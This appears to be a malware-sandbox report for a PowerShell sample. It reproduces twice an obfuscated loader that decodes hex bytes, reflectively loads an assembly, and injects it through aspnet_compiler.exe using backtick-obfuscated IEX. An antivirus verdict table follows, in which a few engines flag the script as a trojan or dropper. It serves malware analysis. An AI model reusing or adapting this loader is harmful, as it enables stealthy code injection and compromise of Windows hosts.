Static | ZeroBOX
No static analysis available.
[String
Function RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$EXRCTVUYBIUYGUTFYRDTESRDYFJT
$RYTFUYGIUHOIJOHUGYT = New-Object -TypeName byte[] -ArgumentList ($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length / 2)
for ($i = 0; $i -lt $EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length; $i += 2) {
$RYTFUYGIUHOIJOHUGYT[$i / 2] = [Convert]::ToByte($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Substring($i, 2), 16)
return [byte[]]$RYTFUYGIUHOIJOHUGYT
[String
[Byte[]]$SRETDRDTFYTYTFTYFYTFYFYFY=RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $ERXTRCYTMVUYIUYUGT
[Byte[]]$YVFJBYYTFYTFVYDYUTRDYTRHVD= RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $RSETDRYFTUYGIOJIPOK
$GFVTHFVYTFTFTDTRCCTRCDTR = 'VNPT.B'
$GFYTFYFGFYFGYJUYHUYTYGTFY5ETR = 'NET'
$VYFVTHFTHYJGUHYTFRDR ='GVHFYTGYTFYTFFHYGFTFTFYpe'.Replace("VHFYTGYTFYTFFHYGFTFTFY","etTy")
$GHFYFBYTBUYGUYHYGFYJFD ='InHGYJGYUGYUHGYUGHHGYFke'.Replace("HGYJGYUGYUHGYUGHHGYF","vo")
$FGYFGTFYDRDDGTFUYUYRFTYD ="GeBFTFYYTGYTFGTRDTRRDod".Replace("BFTFYYTGYTFGTRDTRRD","tMeth")
$DVTRDFTRGTFDTRDTRDT = 'C:\Windows\----------------\aspnet_compiler.exe'.Replace("----------------","Microsoft.NET\Framework\v4.0.30319")
$JYGYBFBGFYTBYJTFGYTDTR = 'L-------------d'.Replace("-------------","oa")
$VDTRVDGYRVDVYRDTR='$n------------ll'.Replace("------------","U")
$GUYFYTGFYTDFTRDT4DER = [Reflection.Assembly]
$FYTVDYTFYGTFTFYTFTFYTF = $GUYFYTGFYTDFTRDT4DER::$JYGYBFBGFYTBYJTFGYTDTR($SRETDRDTFYTYTFTYFYTFYFYFY);$t1 = '$FYTVDYTFYGTFTFYTFTFYTF.$VYFVTHFTHYJGUHYTFRDR($GFVTHFVYTFTFTDTRCCTRCDTR).$FGYFGTFYDRDDGTFUYUYRFTYD($GFYTFYFGFYFGYJUYHUYTYGTFY5ETR).$GHFYFBYTBUYGUYHYGFYJFD';$t2 = '($VDTRVDGYRVDVYRDTR,[object[]] ($DVTRDFTRGTFDTRDTRDT,$YVFJBYYTFYTFVYDYUTRDYTRHVD))';$HBar=($t1,$t2 -Join '')|I`E`X
start-sleep -s 5
[String
Function RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$EXRCTVUYBIUYGUTFYRDTESRDYFJT
$RYTFUYGIUHOIJOHUGYT = New-Object -TypeName byte[] -ArgumentList ($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length / 2)
for ($i = 0; $i -lt $EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length; $i += 2) {
$RYTFUYGIUHOIJOHUGYT[$i / 2] = [Convert]::ToByte($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Substring($i, 2), 16)
return [byte[]]$RYTFUYGIUHOIJOHUGYT
[String
[Byte[]]$SRETDRDTFYTYTFTYFYTFYFYFY=RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $ERXTRCYTMVUYIUYUGT
[Byte[]]$YVFJBYYTFYTFVYDYUTRDYTRHVD= RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $RSETDRYFTUYGIOJIPOK
$GFVTHFVYTFTFTDTRCCTRCDTR = 'VNPT.B'
$GFYTFYFGFYFGYJUYHUYTYGTFY5ETR = 'NET'
$VYFVTHFTHYJGUHYTFRDR ='GVHFYTGYTFYTFFHYGFTFTFYpe'.Replace("VHFYTGYTFYTFFHYGFTFTFY","etTy")
$GHFYFBYTBUYGUYHYGFYJFD ='InHGYJGYUGYUHGYUGHHGYFke'.Replace("HGYJGYUGYUHGYUGHHGYF","vo")
$FGYFGTFYDRDDGTFUYUYRFTYD ="GeBFTFYYTGYTFGTRDTRRDod".Replace("BFTFYYTGYTFGTRDTRRD","tMeth")
$DVTRDFTRGTFDTRDTRDT = 'C:\Windows\----------------\aspnet_compiler.exe'.Replace("----------------","Microsoft.NET\Framework\v4.0.30319")
$JYGYBFBGFYTBYJTFGYTDTR = 'L-------------d'.Replace("-------------","oa")
$VDTRVDGYRVDVYRDTR='$n------------ll'.Replace("------------","U")
$GUYFYTGFYTDFTRDT4DER = [Reflection.Assembly]
$FYTVDYTFYGTFTFYTFTFYTF = $GUYFYTGFYTDFTRDT4DER::$JYGYBFBGFYTBYJTFGYTDTR($SRETDRDTFYTYTFTYFYTFYFYFY);$t1 = '$FYTVDYTFYGTFTFYTFTFYTF.$VYFVTHFTHYJGUHYTFRDR($GFVTHFVYTFTFTDTRCCTRCDTR).$FGYFGTFYDRDDGTFUYUYRFTYD($GFYTFYFGFYFGYJUYHUYTYGTFY5ETR).$GHFYFBYTBUYGUYHYGFYJFD';$t2 = '($VDTRVDGYRVDVYRDTR,[object[]] ($DVTRDFTRGTFDTRDTRDT,$YVFJBYYTFYTFVYDYUTRDYTRHVD))';$HBar=($t1,$t2 -Join '')|I`E`X
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec W32.Spyrat
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb PowerShell.MulDrop.115
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.JS.Crypt
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.